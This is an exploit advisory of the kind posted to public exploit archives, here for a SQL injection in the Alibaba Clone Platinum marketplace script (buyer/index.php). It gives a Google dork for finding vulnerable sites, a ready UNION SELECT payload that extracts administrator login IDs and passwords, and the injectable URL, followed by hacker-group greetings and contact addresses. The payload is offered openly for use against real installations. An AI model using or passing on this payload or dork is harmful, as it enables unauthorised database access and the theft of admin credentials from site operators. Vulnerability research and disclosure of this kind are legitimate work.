[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
# Published : 2010-05-14
# Author : GuN
# Previous Title : VMware View Portal <= 3.1 XSS vulnerability
# Next Title : IPB 3.0.1 sql injection exploit
# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
# Author: GuN
# Published: 2010-14-05
# Verified: yes
........../ˉˉ/).................(ˉˉ..........
........./ˉ.//....................\.ˉ.........
......../..//.........GuN........\..........
../′ˉ`/'
/′`...WJA-TEAM../′` '`′ˉ...
./
'/ / / /¨/ˉ................./ˉ¨ ' .
(
'( ′ ′ ˉ/'' )................( ''/ˉ ` ` )' )
-----------------------------------------------------------------------
Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : GuN
Location : Tunisia - Tunis - Lycée el Omrane
Time Zone : GMT +1:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Alibaba Clone Platinum
Vendor : http://www.alibabaclone.com/
Price : $699 USD
Google Dork : allinurl:buyer/index.php?ProductID=
Overview :B2B
trading Marketplace Script clone of alibaba
Marketplace script is a
wonderful solution to launch your own business to
business and b2c site.
Script is packed with lot of features to provide a
very sound foundation
to your trading portal site.
Exploit:
~~~~~~~
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
SQLi GuN:
~~~~~~~
http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=
GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis
<3 Inter <==> Volc4n0 <==> Vbspiders.com
Contact:
XGuN@Hacker.Ps
~~~~
XGuN@ViP.Cn
~~~~